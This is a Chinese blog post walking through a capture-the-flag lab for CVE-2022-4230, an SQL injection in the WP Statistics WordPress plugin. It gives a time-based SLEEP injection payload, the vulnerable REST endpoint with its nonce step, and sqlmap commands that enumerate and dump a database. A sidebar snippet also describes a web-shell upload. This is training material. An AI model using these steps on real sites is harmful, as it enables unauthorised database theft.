春秋云境 | SQL | CVE-2022-4230

已于 2024-08-10 13:08:03 修改
阅读量336 收藏 2
点赞数 3
分类专栏: 春秋云境靶场 文章标签: sql 数据库 web安全 网络安全 安全 经验分享
于 2024-08-10 13:07:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/141089442
版权

目录

靶标介绍

开启靶场

wpscan漏洞介绍

查询数据库表名

查询表中字段名

查询字段下数据

靶标介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。

开启靶场

开启靶场之后,发现什么都没有,所以我们进行目录扫描,这里我使用的是御剑目录扫描工具

访问 license.txt 无收获,访问 resdme.html 发现以下页面

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/readme.html

点击 login page,发现了一个登录页面

试了用户名和密码是 admin 之后并无发现,左下角有一个“返回到 test”,说明 test 大概率是用户,尝试登录一下

发现登录成功了

wpscan漏洞介绍

根据靶标介绍,这里有插件漏洞,链接:WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com),有兴趣可以了解下

意思大概是这样的:以允许查看WP统计信息的用户身份登录,并通过获取随机数“https://xxx.com/wp-admin/admin-ajax.php?action=rest-nonce”,并在下面的URL中使用它,该URL将延迟5s

首先通过访问,获得随机数(必须要先登录过后台才行)

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

获得随机数之后,把随机数添加到下面那个 URL 中,访问一下试试,这里就不加“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR”了,不加这条语句不影响最终结果

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=16139d290f&name=words&search_engine=aaa

访问之后发现了这个页面,然后用 Burp 抓个包吧

把数据包复制到一个文本里,重命名为 test.txt 拖进 kali 桌面,在桌面打开终端使用 sqlmap 工具跑一下

sqlmap -r test.txt --batch --dbs

发现了 wordpress 敏感数据库

查询数据库表名

sqlmap -r test.txt --batch -D wordpress --tables

发现了一个 flag 表

查询表中字段名

sqlmap -r test.txt --batch -D wordpress -T flag --columns

发现字段名是 flag

查询字段下数据

sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump

发现了 flag

燕雀安知鸿鹄之志哉.
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境CVE-2022-28060
一只爱吃橙子的羊
11-29 2483
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境CVE-2022-24124
一只爱吃橙子的羊
12-02 2498
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
春秋云境CVE-2022-32991
一只爱吃橙子的羊
11-29 917
Web Based Quiz System SQL注入漏洞:CVE-2022-32991
春秋云境CVE-2022-25488
一只爱吃橙子的羊
11-30 1397
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
春秋云境CVE-2022-23366
一只爱吃橙子的羊
12-06 703
Hospital Management Startup 1.0 sqli
春秋云境CVE-2022-24223
一只爱吃橙子的羊
12-02 1268
AtomCMS SQL注入漏洞
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1234
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋云境:CVE-2022-32991(SQL注入)
m0_65712192的博客
04-12 1697
该CMS的welcome.php中存在SQL注入攻击。
春秋云境CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
SQL Server中CPU使用率过高的排查
主宰
08-05 305
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
SQL回顾
Wincreds的博客
08-05 445
②Cookie 是一种客户端的存储技术,用于在浏览器中存储少量数据。参数包含在请求体中,可以是键值对格式或其他格式,如 JSON。①Session 是一种服务器端的存储技术,用于在用户与网站的交互期间保持用户状态。会话数据通常存储在服务器上的文件或数据库中,可以永久存储用户信息,直到会话过期或被清除。会看到结果,正确密码,与其他的长度不一样,由于网站机制,防爬机制,这里我把密码从666改为了8,节约访问次数。旧密码无所谓,利用 admin’# ,进行修改,修改密码实际上修改的是admin的密码。
SQL Server 事务
最新发布
a876106354的博客
08-09 345
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
[SWPUCTF 2021 新生赛]easy_sql
2301_80218721的博客
08-05 380
这个文章讲的东西基本可以够我去理解一些基本的思路和做法,然后文章里面还附带了一些基本的演示。然后我这里直接就是照着那个文章的思路去写的题目。转web之后第一次做sql,还不是很懂。然后就得到了flag。
春秋云境CVE-2022-29464
07-28
根据引用\[1\],CVE-2022-29464是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE(远程命令执行)权限。 根据引用\[2\],攻击者可以通过上传名为1.jsp的恶意文件来利用该漏洞。该文件包含了一个表单,其中包含一个名为"cmd"的输入框,攻击者可以在此输入框中输入命令,并通过点击"Run"按钮来执行该命令。该文件还包含了Java代码,用于执行命令并将输出返回给攻击者。 根据引用\[3\],该漏洞的受攻击的上传路由是/fileupload,由FileUploadServlet处理。而Identity.xml是一个配置文件,该文件上的路由(/fileupload)不受IAM(身份和访问管理)保护。 综上所述,CVE-2022-29464是一个严重的漏洞,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得远程命令执行权限。 #### 引用[.reference_title] - *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)](https://blog.csdn.net/FODKING/article/details/125746993)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值